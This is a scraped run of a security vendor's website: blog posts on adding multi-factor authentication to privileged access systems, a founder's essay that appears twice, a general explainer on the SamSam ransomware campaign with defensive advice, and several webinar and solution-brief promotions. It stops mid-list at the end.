To offer real protection, an MFA solution must provide a way to secure each interface into the PAM system. Without protecting all the interfaces, you are leaving a vulnerability in the system that will allow an attacker to get in. In many cases MFA is not implemented on all the PAM interfaces due to the complex integration requirements. In most cases MFA implementations require agents or proxies as well as changes to the network architecture. As PAM solutions are often delivered as a “black box” appliance, it’s not possible to install agents or make changes to the code. MFA solutions that are based on RADIUS are complex to implement and provide a poor user experience, because a One-Time Password (OTP) has to be typed for each session that is opened (keep in mind that administrators might open countless sessions every day – so it becomes a nuisance).

Silverfort’s agentless and proxy-less solution enables MFA on all PAM interfaces without the need to make complex changes to the system or the environment. Thanks to Silverfort’s agentless architecture, it is also possible to protect all the interfaces to the PAM solution, including the web interface, GUI client, API and proxies, without the need to perform MFA again and again for each session.

When choosing an MFA vendor, it is also important to take into consideration the end-user experience. IT administrators (who use privileged accounts) are usually very sensitive to changes in their workflow. They also use the PAM solution multiple times in the span of an hour, so any inconvenience can have a major impact on productivity. In most cases the users are storing the credentials for the PAM solution in their browsers or connection managers to make their life easier.

Other aspects that should be considered when choosing an MFA provider for a PAM solution:

1. Changes to current workflows
2. Ability to open multiple sessions at the same time without multiple MFA challenges
3. Easy-to-use MFA options such as soft tokens and mobile MFA apps
4. Ability to trigger MFA only once within a given time frame
5. Risk-based MFA that considers user behavior and context

Silverfort’s risk-based authentication solution is flexible and provides a balance between security and user experience by allowing users to authenticate with MFA only once in a while, while keeping them secured all the time. This, together with the adaptive risk-based approach, makes it an ideal MFA solution for a PAM implementation.

### Final Words

PAM is a critical security layer for organizations.
PAM projects require a significant amount of time and resources. Does it make sense to go through all the trouble to lock the door but leave the window open? MFA should be added to protect your PAM solution from day one. It should be considered an integral part of the PAM solution and be used to secure access through all routes and interfaces in order to protect the most important assets in your network.

---

- Published: 2018-11-07
- Modified: 2024-03-13
- URL: https://www.silverfort.com/blog/rethinking-mfa/

By Hed Kovetz, CEO and Co-Founder, Silverfort

We all dream of a world where we can trust everyone who accesses our corporate resources - but the reality is different. Adversaries are constantly trying to breach our systems and access our sensitive data, using our vulnerable authentication mechanisms against us. The problems of password authentication have been known for decades. The introduction of multi-factor authentication was the first major step towards strengthening authentication. Today, MFA is used by almost all enterprises in some capacity, yet it is still used for protecting only a small portion of our sensitive assets. This must make you wonder - if the problem is well known and the solution is available, why aren’t we using MFA to protect all systems? Why do we still rely on passwords so much? This is especially alarming considering that the use of compromised passwords in data breaches is growing from year to year instead of shrinking.

Realizing this drove me, together with my co-founders Matan Fattal and Yaron Kassner, to start Silverfort. We met during our years at the Israeli cyber intelligence unit 8200, where we served in cybersecurity research, team leadership and group leadership roles, and got the opportunity to lead innovative research projects and the development of cutting-edge technologies. Each of us later worked for industry-leading companies, until three years ago we joined forces again to establish Silverfort. Being innovators in the authentication space, we always thought that MFA would never be truly effective as long as it remained a point solution for protecting individual assets. Our approach is fundamentally different. For the first time, MFA will be designed to easily and seamlessly protect any organizational resource, no matter what it is, or where it is.

### Who moved my perimeter?

Like many other security frameworks, MFA was designed under the perception of the perimeter – the clear border separating the “trusted” corporate network from the “untrusted” external network. In this simple reality, it was enough to enforce MFA at the “door” – the VPN gateway, and maybe for a few remote resources. MFA solutions were therefore built to protect a specific point of access, and while their user experience evolved over the years, this basic assumption did not.

In recent years, network perimeters have been gradually dissolving. IT revolutions such as cloud, IoT and BYOD are just some of the reasons why the physical boundaries of the corporate network are becoming irrelevant. This new era is challenging traditional security frameworks – where do I put my gatekeeper if there’s no clear gate? Where do I enforce MFA in a dynamic, hybrid environment where countless different devices and services are connecting to one another? That is why one infected endpoint is enough to take over an entire network using credential theft and lateral movement, as demonstrated in the 2017 NotPetya attack and many others.

### Integrating MFA system by system – a lost battle

To better address the changing needs of their customers, MFA vendors have begun offering a long list of integrations, software agents, SDKs, proxies and other tools that enable MFA for more systems. Yet deploying them has become an endless task for security teams. With each solution offering integrations with specific systems, organizations are often forced to maintain several MFA solutions in order to protect their critical assets. This results in high costs, on-going investment of professional resources, and inconsistent user experience. It also limits the potential of risk-based adaptive authentication, because each MFA solution monitors only a portion of the network assets (for example, only web applications), without any consolidated risk analysis that takes into account user behavior across all systems and environments.

More importantly, many types of sensitive resources cannot be protected by current MFA solutions, for multiple reasons:

- In many cases, deploying software agents or making local modifications to certain systems isn’t technically feasible. This is the case with many proprietary and legacy systems, file shares (which are now targeted by ransomware), IoT devices and more.
- For many critical assets and 3rd-party systems, technical modifications are refused by resource owners or prohibited by the manufacturers. This is common with production-critical servers and industrial control systems (ICS).
- In many organizations, the number of assets and the dynamic nature of the environment make asset-by-asset integration impossible, such as in large enterprise networks and complex IaaS environments where countless different VM instances are created or moved between environments on a daily basis, or in cases where business units are implementing systems that IT has no idea about - a phenomenon called “shadow IT”.

### Rethinking MFA

Looking at the challenges and limitations of traditional MFA solutions, it seems that the attempt to “stretch” traditional MFA solutions to fit today’s reality has reached its limits, and attackers are taking advantage of it. It’s time to go back to the drawing board and design a new breed of MFA solutions. We need to look at the network as a whole instead of integrating MFA into each individual asset. We need a way to seamlessly deliver strong authentication to systems that are currently considered “unprotectable” or that the IT department doesn’t even know about. We need a way to enable unified authentication policies, visibility, user experience and risk analysis across all systems and environments.

By changing the way MFA is designed and implemented, Silverfort has opened a new chapter in enterprise authentication, enhancing the ability to trust users, manage secure access across all corporate systems and environments, respond to threats with real-time step-up authentication and enforce true risk-aware adaptive authentication that is not limited to specific systems. Three years into this journey, the Silverfort Next Generation Authentication Platform is now used by organizations all over the world to achieve exactly that. We help financial institutions enable MFA for their SWIFT servers, legacy financial applications and various servers where MFA is required by PCI DSS, SWIFT CSP, GDPR or the NY-DFS cybersecurity regulations. We help healthcare organizations enforce risk-based authentication across medical IoT devices, PACS servers and sensitive health records (EHRs). We help energy and manufacturing companies apply MFA not only in their IT environment, but also across their OT networks. We help organizations in all industries deliver holistic authentication policies, unified visibility and frictionless user experience across all systems and environments.
Along the way we earned the support of great investors, leading partners, industry experts and most importantly – happy customers. But this is only the beginning – now it’s time to spread the word and reshape the authentication market. Hed Kovetz, CEO and Co-Founder, Silverfort Hed serves as Silverfort’s CEO and is one of the company’s Co-Founders. He brings a unique technical and leadership background, including product leadership roles at Verint, where he led the company’s nation-scale cybersecurity product and won the company’s innovation competition for his patent-pending inventions. Hed previously served as a Group Leader at the famous 8200 elite cyber unit of the Israel Defense Forces, where he received the unit’s excellence awards and the Chief of Intelligence Corps Award for Innovation. Hed holds an LL. B. from Tel Aviv University. I look forward to continuing this journey and invite you to join us. --- - Published: 2018-09-04 - Modified: 2024-09-09 - URL: https://www.silverfort.com/blog/how-to-stop-iranian-samsam-hackers-from-taking-your-network-for-ransom-2/ SamSam – sounds cute, right? Well, it’s not. SamSam is a destructive ransomware that affected more than 200 victims across the US, including hospitals, city governments, and other organizations in 2018. On November 28, the US Department of Justice has charged two Iranian nationals with... By Yaron Kassner, CTO and Co Founder, Silverfort SamSam – sounds cute, right? Well, it’s not. SamSam is a destructive ransomware that affected more than 200 victims across the US, including hospitals, city governments, and other organizations in 2018. On November 28, the US Department of Justice has charged two Iranian nationals with computer hacking offenses in connection with the global SamSam ransomware outbreak. The alleged criminals are currently in Iran, out of the reach of US law enforcement, and I doubt the two suspects will travel to the U. S. to face questioning. I also doubt that these attacks will stop. 
So, it’s important to understand how this attack operates and implement some protective measures. Compromising the First Endpoint SamSam targets computers that are open to remote desktops from the internet. Finding such endpoints is super easy: free tools like Shodan can provide a list of such machines. As of today, there are 2,475,311 records of remote desktops open to the Internet in Shodan. The passwords to these desktops can be hacked with brute-force attacks or simply purchased on the dark web. The increased use of cloud environments puts organizations at risk, because a reckless admin could easily expose a machine in the cloud without protecting access to it from the internet. Moving Deeper into the Network SamSam doesn’t only encrypt the files of a single infected endpoint. Once the endpoint is compromised, SamSam utilizes stolen credentials and exploits vulnerabilities like EternalBlue to move laterally across the network. It uses “feed of the earth techniques” i. e. existing administration tools. This enables the ransomware to reach more valuable servers that hold more valuable data. Instead of holding one computer hostage, it takes over the entire network. Backups are often thought of as being a defense mechanism for ransomware prevention. However, the ability to move laterally in the network also enables SamSam to reach these backups and render them useless. A victim whose backups were encrypted, would have to pay the ransom, or lose the data. SamSam Mitigation Costs Exceed the Ransom Payment So far, the hackers made more than $6M in ransom. However, the costs to impacted organizations are much higher, because after paying the ransom and unlocking their files, they also need to make sure that the threat is completely removed from their networks. When the city of Atlanta was infected, they spent a total of $17M in efforts to resolve the incident, even though the ransom requested was much lower than that. 
In addition to the costs of the ransom, there is the obvious cost of the outage inflicted until the threat is removed. Perhaps that’s one of the reasons the malware is attacking so many healthcare providers – they can’t afford to go down. How to protect your organizations from SamSam Ransomware? Backup your data offline: If you’re counting on your backups to save you from ransomware, you need to make sure that the attacker won’t get to your backups as well. Keep in mind that saving your backups in the network, means that they are exposed to ransomware just as much as any other data in the network. Identify remote desktop servers that are exposed over the internet: Find a way to discover remote desktops that are exposed over the internet. An exposed remote desktop will be subject to a brute-force attack within hours of the exposure over the internet. So, a good way to identify internet-exposed remote desktops is to look for brute-force attacks. Silverfort can help you do that. Protect RDP Access by Enforcing Multi-Factor Authentication – if you have to expose a remote desktop to the internet, use a VPN or a bastion host. These prevent direct network access to the machine. But password-based authentication isn’t enough. You should also add MFA to validate that the credentials are indeed used by a legitimate user. Silverfort enables you to add MFA to these systems without any agents. Prevent lateral movement - Enforcing MFA on the use of administrative tools such as PSExec can effectively block such attacks. However, traditional MFA solutions can’t be implemented for such tools. Silverfort’s agentless MFA platforms can be easily extended to these tools as well. Protect access to your sensitive data – Enforce MFA for any access to sensitive resources, including databases, and file shares. Yaron Kassner, CTO and Co Founder, Silverfort Silverfort’s CTO and Co-Founder Yaron Kassner is a cybersecurity and big data technology expert. 
Before co-founding Silverfort, Yaron served as a big data expert consultant for Cisco. He also developed new capabilities involving big data analytics and machine learning algorithms at Microsoft. Prior to that, Yaron served in the 8200 elite cyber unit of the Israel Defense Forces, where he led a reputable R&D team, rose to the rank of Captain, and received a prestigious excellence award. Yaron holds a B.Sc. in Mathematics, Summa Cum Laude, and an M.Sc. and Ph.D. in Computer Science from the Technion – Israel Institute of Technology.

To find out how Silverfort can protect your organization against SamSam and other threats, contact us today.

---

- Published: 2018-07-04
- Modified: 2024-09-09
- URL: https://www.silverfort.com/blog/rethinking-mfa-2/

By Hed Kovetz, CEO and Co-Founder, Silverfort

We all dream of a world where we can trust everyone who accesses our corporate resources - but the reality is different. Adversaries are constantly trying to breach our systems and access our sensitive data, using our vulnerable authentication mechanisms against us.

The problems of password authentication have been known for decades. The introduction of multi-factor authentication was the first major step towards strengthening authentication. Today, MFA is used by almost all enterprises in some capacity, yet it is still used to protect only a small portion of our sensitive assets. This must make you wonder - if the problem is well known and the solution is available, why aren’t we using MFA to protect all systems? Why do we still rely on passwords so much? This is especially alarming considering that the use of compromised passwords in data breaches is growing from year to year instead of shrinking.
Realizing this drove me, together with my co-founders Matan Fattal and Yaron Kassner, to start Silverfort. We met during our years at the Israeli cyber intelligence unit 8200, where we served in cybersecurity research, team leadership and group leadership roles, and got the opportunity to lead innovative research projects and the development of cutting-edge technologies. Each of us later worked for industry-leading companies, until three years ago we joined forces again to establish Silverfort.

Being innovators in the authentication space, we always thought that MFA would never be truly effective as long as it remained a point solution for protecting individual assets. Our approach is fundamentally different. For the first time, MFA will be designed to easily and seamlessly protect any organizational resource, no matter what it is or where it is.

### Who moved my perimeter?

Like many other security frameworks, MFA was designed under the perception of the perimeter – the clear border separating the “trusted” corporate network from the “untrusted” external network. In this simple reality, it was enough to enforce MFA at the “door” – the VPN gateway, and maybe for a few remote resources. MFA solutions were therefore built to protect a specific point of access, and while their user experience evolved over the years, this basic assumption did not.

In recent years, network perimeters have been gradually dissolving. IT revolutions such as cloud, IoT and BYOD are just some of the reasons why the physical boundaries of the corporate network are becoming irrelevant. This new era is challenging traditional security frameworks – where do I put my gatekeeper if there’s no clear gate? Where do I enforce MFA in a dynamic, hybrid environment where countless different devices and services are connecting to one another?
That is why one infected endpoint is enough to take over an entire network using credential theft and lateral movement, as demonstrated in the 2017 NotPetya attack and many others.

### Integrating MFA system by system – a lost battle

To better address the changing needs of their customers, MFA vendors have begun offering a long list of integrations, software agents, SDKs, proxies and other tools that enable MFA for more systems. Yet deploying them has become an endless task for security teams. With each solution offering integrations with specific systems, organizations are often forced to maintain several MFA solutions in order to protect their critical assets. This results in high costs, ongoing investment of professional resources, and an inconsistent user experience. It also limits the potential of risk-based adaptive authentication, because each MFA solution monitors only a portion of the network assets (for example, only web applications), without any consolidated risk analysis that takes into account user behavior across all systems and environments.

More importantly, many types of sensitive resources cannot be protected by current MFA solutions, for multiple reasons:

- In many cases, deploying software agents or making local modifications to certain systems isn’t technically feasible. This is the case with many proprietary and legacy systems, file shares (which are now targeted by ransomware), IoT devices and more.
- For many critical assets and 3rd-party systems, technical modifications are refused by resource owners or prohibited by the manufacturers. This is common with production-critical servers and industrial control systems (ICS).
- In many organizations, the number of assets and the dynamic nature of the environment make asset-by-asset integration impossible, such as in large enterprise networks and complex IaaS environments where countless different VM instances are created or moved between environments on a daily basis, or in cases where business units are implementing systems that IT has no idea about - a phenomenon called “shadow IT”.

### Rethinking MFA

Looking at the challenges and limitations of traditional MFA solutions, it seems that the attempt to “stretch” traditional MFA solutions to fit today’s reality has reached its limits, and attackers are taking advantage of it. It’s time to go back to the drawing board and design a new breed of MFA solutions. We need to look at the network as a whole instead of integrating MFA into each individual asset. We need a way to seamlessly deliver strong authentication to systems that are currently considered “unprotectable” or that the IT department doesn’t even know about. We need a way to enable unified authentication policies, visibility, user experience and risk analysis across all systems and environments.

By changing the way MFA is designed and implemented, Silverfort has opened a new chapter in enterprise authentication, enhancing the ability to trust users, manage secure access across all corporate systems and environments, respond to threats with real-time step-up authentication and enforce true risk-aware adaptive authentication that is not limited to specific systems. Three years into this journey, the Silverfort Next Generation Authentication Platform is now used by organizations all over the world to achieve exactly that. We help financial institutions enable MFA for their SWIFT servers, legacy financial applications and various servers where MFA is required by PCI DSS, SWIFT CSP, GDPR or the NY-DFS cybersecurity regulations.
We help healthcare organizations enforce risk-based authentication across medical IoT devices, PACS servers and sensitive health records (EHRs). We help energy and manufacturing companies apply MFA not only in their IT environment, but also across their OT networks. We help organizations in all industries deliver holistic authentication policies, unified visibility and a frictionless user experience across all systems and environments.

Along the way we earned the support of great investors, leading partners, industry experts and most importantly – happy customers. But this is only the beginning – now it’s time to spread the word and reshape the authentication market. I look forward to continuing this journey and invite you to join us.

Hed Kovetz, CEO and Co-Founder, Silverfort

Hed serves as Silverfort’s CEO and is one of the company’s Co-Founders. He brings a unique technical and leadership background, including product leadership roles at Verint, where he led the company’s nation-scale cybersecurity product and won the company’s innovation competition for his patent-pending inventions. Hed previously served as a Group Leader at the famous 8200 elite cyber unit of the Israel Defense Forces, where he received the unit’s excellence awards and the Chief of Intelligence Corps Award for Innovation. Hed holds an LL.B. from Tel Aviv University.

---

## Resources

- Published: 2025-08-26
- Modified: 2025-08-26
- URL: https://www.silverfort.com/resources/beyond-the-perimeter-modernizing-active-directory-protection-against-lateral-movement-and-privileged-access-abuse/

Identity is the new perimeter - and attackers know it. Breaches don’t end with the first compromise. Adversaries move laterally through Active Directory (AD), abusing “legitimate” protocols like NTLM, Kerberos, RDP, and SSH that most tools mistake for normal traffic. The problem: AD doesn’t natively enforce MFA on these protocols.
Common hops - PsExec, PowerShell, WMI, even service-to-service authentications - go unchecked. Sprawling service accounts, stale credentials, and privilege creep create blind spots that attackers exploit to escalate access and jump between on-prem and cloud resources. Silverfort field research shows hybrid AD environments are full of undocumented accounts and unmanaged identities - prime targets for attackers. It’s clear: perimeter controls and bolt-on MFA aren’t enough.

In this webinar, you’ll learn about topics including:

- The state of identity-based attacks and why credentials remain the weapon of choice
- How lateral movement drives modern breaches
- Why common tools (vaults, legacy MFA, basic logging) leave gaps

Additionally, Rob Larsen – Security Advisor at Silverfort – will dive deep into topics such as:

- Identity Attack Paths – Real-world abuse of unmanaged service accounts, over-privileged credentials, and MFA blind spots
- AD Protocols & Lateral Movement – How NTLM, Kerberos, RDP, and SSH enable privilege escalation while evading defenses
- Securing Privileged & Service Accounts – Using analytics to uncover high-risk identities and enforce adaptive MFA
- Extending MFA Everywhere – Protecting legacy servers, Unix systems, and automated scripts with policy-based MFA

---

- Published: 2025-08-26
- Modified: 2025-08-26
- URL: https://www.silverfort.com/resources/accelerating-passkey-adoption-with-microsoft-yubico-silverfort/

Strengthen your cyber defences with FIDO2 and passkeys

Adopting phishing-resistant authentication methods with FIDO2 and passkeys is essential to safeguarding your organisation against credential-based attacks. But success depends not only on the strength of the technology – it’s also about ease of deployment and user adoption at scale.
In this webinar, hear from experts from Microsoft, Yubico, and Silverfort as they share how you can:

- Accelerate secure onboarding of passkeys for users with new capabilities in Entra ID
- Deploy YubiKeys rapidly across large user populations
- Extend FIDO2 MFA to legacy systems and Windows AD environments

Featured Speakers:

- Merill Fernando, Principal Product Manager, Microsoft: Discover Microsoft’s new FIDO2 provisioning APIs (in public preview) in Entra ID and how they simplify large-scale deployment of security keys.
- Alex Wilson, Director of Solutions Engineering APJ, Yubico: Learn how Yubico leverages these APIs to roll out passkeys on YubiKeys at speed and scale, improving security and user experience.
- Philip Richardson, Technology Alliances APJ, Silverfort: See how Silverfort enables FIDO2 MFA for on-premises Windows AD authentications – protecting systems that were previously ‘unprotectable’.

---

- Published: 2025-08-14
- Modified: 2025-08-14
- URL: https://www.silverfort.com/resources/swift-customer-securitycontrols-framework-cscf-v2025/

Complying with SWIFT's updated Customer Security Controls Framework (CSCF) is no small feat—especially when legacy systems and identity gaps get in the way. Silverfort helps you meet the new identity-focused requirements head-on. This solution brief explores how Silverfort enables financial institutions to meet CSCF v2025 controls with precision, speed, and clarity. From privileged access management to real-time threat detection, Silverfort delivers full visibility and enforcement across the authentication layer—covering every user, service account, and authentication protocol in your SWIFT-connected environment. With detailed control mappings to CSCF sections like 1.2 (OS Privileged Account Control), 4.2 (MFA), 5.1 (Logical Access Control), 6.5A (Intrusion Detection), and 7.1 (Incident Response), Silverfort provides the technical and operational coverage you need—no system overhauls required.
In this solution brief, you’ll learn how to:

- Enforce MFA and privilege restrictions across legacy applications, command-line tools, and modern systems.
- Detect identity threats in real time with behavior-based access monitoring and response.
- Streamline CSCF compliance with continuous monitoring, audit-ready reporting, and centralized policy management.

---

- Published: 2025-08-13
- Modified: 2025-08-13
- URL: https://www.silverfort.com/resources/identity-security-at-a-crossroads-esg-research/

Workforce identity security is in a state of flux, with changing enterprise infrastructure, an expanding application portfolio to integrate, and sprawling cloud deployments that are exposing unsolved problems, inefficient processes, and fragmented solutions. Analyst firm Enterprise Strategy Group (ESG) surveyed 370 IT and cybersecurity decision makers to identify the pain points that are top-of-mind, as well as to uncover the strategies teams plan to implement to tackle growing identity security concerns.

Key findings include:

- 67% of teams are concerned about non-human identity (NHI) security
- 52% of identity security leaders are concerned about data privacy as a result of AI agent adoption
- 46% of organizations use multiple solutions for MFA
- 35% of organizations manage 1,000+ business applications

If you lead identity security initiatives for your organization, get the report today to see where your peers are focusing their attention in 2025 and beyond.

---

- Published: 2025-08-07
- Modified: 2025-08-07
- URL: https://www.silverfort.com/resources/closing-identity-security-gaps-how-ping-identity-and-silverfort-protect-every-access-point/

Scroll down to watch the webinar, or head over to YouTube.

Enterprises rely on Ping Identity to manage and secure user access across a wide range of systems.
But even with strong IAM in place, critical blind spots remain: legacy systems that don’t support modern security controls, command-line access that bypasses MFA, and non-human identities like Active Directory service accounts that silently operate in the background—often without visibility or control. That’s where Silverfort comes in.

Join us for an eye-opening session where we’ll show how Ping Identity and Silverfort work better together to deliver comprehensive identity security across your entire hybrid environment—including those traditionally hard-to-secure systems and identities.

In this webinar, you’ll learn how this partnership enables you to:

- Extend Ping’s policy-based access control and MFA to any resource, including legacy apps, file shares, and infrastructure access over RDP or SSH.
- Gain full visibility into all authentication activity—for both human and non-human identities—across your hybrid network.
- Discover and secure service accounts and other non-human identities that attackers often exploit to move laterally undetected.
- Apply consistent, centralized policies to systems and tools that previously operated in silos.

We’ll walk through real-world use cases, live demos, and practical examples that show how leading organizations are using Silverfort and Ping Identity to close security gaps and protect what matters most: every identity in the enterprise.

https://youtu.be/PWTGGZ2BJJI

---

- Published: 2025-08-05
- Modified: 2025-08-07
- URL: https://www.silverfort.com/resources/cloud-non-human-identity-nhi-security/

Get control of cloud NHIs before they become a problem

Non-human identities are powering your cloud, but who’s managing them? As organizations scale in the cloud, non-human identities (NHIs) like service accounts and machine credentials are exploding in volume—and most aren’t getting the attention they need. These identities often fly under the radar, created by different teams, over-permissioned, unmonitored, and rarely rotated.
That makes them a prime target for attackers—and a growing blind spot in your security stack. This solution brief walks you through how Silverfort helps uncover, assess, and secure NHIs across identity providers, cloud infrastructure, and SaaS platforms. From discovery to remediation, Silverfort delivers the full picture of every machine identity in your environment—plus the tools to reduce risk fast.

In this solution brief, you’ll learn how to:

- Discover and classify all NHIs across platforms like Okta, Entra, AWS, Azure, GCP, GitHub, and more.
- Visualize and investigate each identity’s privileges, credentials, usage patterns, and ownership.
- Prioritize and remediate exposures with clear, actionable recommendations to improve security posture.

Get the PDF to see how Silverfort helps you bring visibility, control, and confidence to your cloud NHI strategy.

---

- Published: 2025-08-01
- Modified: 2025-08-01
- URL: https://www.silverfort.com/resources/silverfort-and-netskopes-risk-intelligence-integration/

Silverfort and Netskope have integrated to help organizations enforce smarter, risk-based access decisions across cloud and hybrid environments. The integration allows identity and network risk signals to flow between the two platforms, enhancing visibility and control. This solution brief introduces the Silverfort-Netskope integration, built to close security gaps between identity and network access. Whether you choose to send risk from Silverfort into Netskope or vice versa, the integration allows each platform to enhance enforcement policies based on shared, real-time risk context. By feeding identity insights into Netskope’s User Confidence Index (UCI), or ingesting web access risk from Netskope into Silverfort, organizations can dynamically adjust access controls, reduce exposure to threats, and unify visibility across hybrid environments. It’s the next step toward risk-adaptive Zero Trust.
In this PDF, you’ll learn how to:

- Exchange identity and network risk signals between Silverfort and Netskope to inform enforcement decisions.
- Reduce exposure to threats like compromised credentials by adjusting access in real time.
- Unify policy enforcement across cloud apps, web traffic, and hybrid identity systems.

Get the solution brief to learn how Silverfort and Netskope are reshaping adaptive security—one API call at a time.

---

- Published: 2025-07-30
- Modified: 2025-07-29
- URL: https://www.silverfort.com/resources/rfp-checklist/

No email address required!

Most organizations operate with a hybrid, fragmented IAM infrastructure – making it a complex task for identity and security teams to enforce consistent policies, maintain visibility into risks like lateral movement and privilege escalation, or respond to threats in real time. To make sense of the identity security capabilities that truly matter, get the Identity Security RFP Checklist.

Here’s the value you’ll walk away with:

- Specific questions to ask when evaluating vendors across six key capabilities
- Downloadable templates that you can customize for your team
- Clarity on what matters to your particular team when searching for solutions to timely concerns

Make identity security your strategic advantage – download the guide now.

---

- Published: 2025-07-28
- Modified: 2025-07-28
- URL: https://www.silverfort.com/resources/silverfort-crowdstrike-siem-for-risk-and-incident-monitoring/

Streamline identity threat detection across your entire security stack

Traditional IAM tools leave gaps. This solution brief shows how Silverfort and CrowdStrike Falcon® Next-Gen SIEM fill them by bringing deep identity threat data into your SIEM environment in real time. SOC teams gain a complete picture of both endpoint and identity-based risks, all within a single console. Silverfort continuously streams high-fidelity alerts—like suspicious logins, MFA fatigue, and credential misuse—into CrowdStrike’s SIEM platform.
These signals are automatically correlated with endpoint behavior and network telemetry to enrich detection, reduce alert fatigue, and accelerate investigation timelines.

In this PDF, you’ll learn how to:

- Detect identity-based threats faster with real-time alerts for brute force, lateral movement, and more.
- Correlate identity risk with endpoint and network data for deeper threat context.
- Enhance SOC efficiency by embedding identity risk into existing CrowdStrike workflows.

Download the PDF to discover how Silverfort and CrowdStrike bring clarity and speed to identity threat detection—right inside your SIEM.

---

- Published: 2025-07-28
- Modified: 2025-07-28
- URL: https://www.silverfort.com/resources/silverfort-crowdstrike-falcon-edr/

Extend detection and response from endpoints to identity

This solution brief reveals how Silverfort and CrowdStrike Falcon Insight work together to create a real-time feedback loop between user behavior and device telemetry, delivering smarter threat detection and faster incident response. Silverfort enriches Falcon with risk scores tied to users and devices, while Falcon shares endpoint alerts to inform Silverfort’s dynamic access policies. The result? Your SOC can detect and stop attackers before they pivot across systems or escalate privileges—all with greater context and less noise.

In this PDF, you’ll learn how to:

- Correlate authentication risk with endpoint activity to investigate threats in full context.
- Prevent lateral movement by enforcing real-time access controls on high-risk users.
- Hunt smarter by linking login anomalies with malicious process behavior across devices.

Download the PDF now to see how Falcon and Silverfort together make XDR smarter, faster, and identity-aware.
---

- Published: 2025-07-21
- Modified: 2025-08-21
- URL: https://www.silverfort.com/resources/identity-first-incident-response-with-silverfort/

Compromised identities are the entry point for nearly every cyberattack—and time is your most precious asset when responding. Silverfort’s Identity-First Incident Response offers a groundbreaking approach to detecting and containing identity-based threats in Active Directory (AD) environments with unmatched speed and precision. This solution brief outlines how security and incident response teams can shift from reactive to proactive with identity at the center of their strategy. Learn how Silverfort’s patented Runtime Access Protection (RAP) technology enables immediate enforcement of MFA and access-blocking policies across all AD authentications—without infrastructure changes.

You’ll discover:

- How to detect and lock down compromised accounts automatically within minutes
- Why lateral movement becomes trivially traceable with identity-based telemetry
- How to map and remediate identity weaknesses post-incident to prevent repeat attacks
- A step-by-step IR process drill-down that moves from containment to hardening with zero guesswork

Whether you’re managing a sprawling multi-domain environment or responding to an active threat, this guide will show you how to accelerate IR workflows, reduce attack dwell time, and restore operations securely—with minimal disruption. Get the PDF now to learn how to transform your incident response strategy by putting identity first.

---

- Published: 2025-07-21
- Modified: 2025-07-21
- URL: https://www.silverfort.com/resources/silverfort-and-ping-identity-integration/

What if PingID could protect every corner of your environment—from SaaS apps to the most legacy on-prem servers? Now it can. This solution brief introduces the powerful Silverfort + Ping Identity integration, which enables organizations to apply PingID’s robust MFA to all access points—cloud and on-prem alike.
That includes legacy applications, command-line tools, RDP sessions, file shares, and more. You’ll see how Silverfort’s real-time risk engine evaluates every authentication request, whether from a user, admin, or service account, and determines whether step-up authentication is needed. It’s MFA where it matters most, triggered only when risk is detected, so users aren’t overwhelmed and security isn’t compromised. If you’re looking to close gaps in your zero trust architecture and protect resources that Ping couldn’t reach before, this guide is for you.

In this PDF, you’ll learn how to:

- Extend PingID MFA protection to previously unreachable resources like legacy systems, infrastructure, and internal admin tools.
- Apply advanced risk-based policies that evaluate user context before requiring MFA, reducing friction and fatigue.
- Unify identity security across cloud and on-prem environments for consistent, real-time protection.

Download the solution brief now to discover how Silverfort and Ping Identity work better together to secure every authentication, everywhere.

---

- Published: 2025-07-10
- Modified: 2025-07-10
- URL: https://www.silverfort.com/resources/accelerez-votre-mise-en-conformite-nis2-avec-silverfort/

According to some estimates, more than 15,000 organisations will be affected by the French transposition of NIS 2. “Essential” and “important” entities must therefore prepare a compliance roadmap to increase their cyber resilience, covering, among many other topics, the security of their directories, account and access management, and control over administration. Join us for this webinar to discover how Silverfort can help you achieve these objectives efficiently.

---

- Published: 2025-07-01
- Modified: 2025-07-01
- URL: https://www.silverfort.com/resources/introduction-to-identity-protection-in-the-zero-trust-era-japanese/

What is the essence of Zero Trust? And why is “identity” now the top priority?
In this seminar, we use an overview of Silverfort to give a clear introduction to the challenges in modern cybersecurity strategy and their solutions.

Agenda:

- Introduction to Silverfort / Silverfort overview (15 min): 青山裕宣, Country Lead, Silverfort Japan
- Silverfort feature introduction and demo (30 min): 佐藤公理, Senior Sales Engineer, CISSP CISA CISM
- Q&A and individual consultations (15 min)

---

- Published: 2025-07-01
- Modified: 2025-07-01
- URL: https://www.silverfort.com/resources/silverfort-cortex-xsoar/

Real-time identity threat response, now fully automated

Traditional IAM tools weren’t built to detect identity threats like lateral movement or account takeover—and that leaves security teams exposed. Enter the Silverfort + Cortex XSOAR integration. This solution brief introduces how Silverfort’s real-time identity threat detection pairs perfectly with Cortex XSOAR’s automation and orchestration to deliver a smarter, faster, and more efficient incident response process. You’ll see how identity-based intelligence is dynamically ingested into XSOAR playbooks, allowing you to take immediate action with no delays or bottlenecks.

In this PDF, you’ll learn how to:

- Detect and respond to threats instantly by unifying identity risk with automated SOAR workflows.
- Trigger adaptive enforcement like MFA or access blocks based on live risk signals.
- Streamline incident handling with identity-aware playbooks that reduce manual work.

Download the PDF to learn how to close the identity detection gap—and automate your response like never before.

---

- Published: 2025-07-01
- Modified: 2025-07-01
- URL: https://www.silverfort.com/resources/silverfort-cortex-xdr/

Unified endpoint + identity defense to stop modern attacks

Endpoints and identities are often exploited together, but they’re still too often defended separately. This solution brief shows how Silverfort and Cortex XDR change that. By integrating identity telemetry from Silverfort with Cortex XDR’s behavioral analytics, your SOC can detect and investigate identity-driven threats like brute force, Pass-the-Hash, and Kerberos abuse—before they escalate.
With real-time alerts and enforcement actions like MFA and access blocking, this integration gives you end-to-end visibility and control across your hybrid environment.

In this PDF, you’ll learn how to:

- Prevent lateral movement and ransomware propagation with identity-aware incident detection.
- Enrich investigations with cross-layer context that connects user authentication with endpoint behavior.
- Accelerate response without disruption using automatic enforcement policies.

Download the PDF and see how Silverfort and Cortex XDR give you a powerful edge in stopping identity-based attacks—fast.

---

- Published: 2025-06-23
- Modified: 2025-06-23
- URL: https://www.silverfort.com/resources/comply-with-zero-trust-maturity-model-ztmm-requirements-with-silverfort/

Developed by CISA to guide U.S. federal agencies and adopted widely across critical industries like finance, energy, and healthcare, ZTMM offers a practical roadmap for implementing Zero Trust Architecture (ZTA) principles. Silverfort’s latest whitepaper, Comply with Zero Trust Maturity Model (ZTMM) Requirements with Silverfort, shows how organizations can meet ZTMM’s identity security requirements and achieve real, measurable progress along its maturity curve. Learn how to protect all users, devices, and services—no matter where they live—by extending modern security controls across your entire hybrid environment.

In this whitepaper, you’ll discover how to:

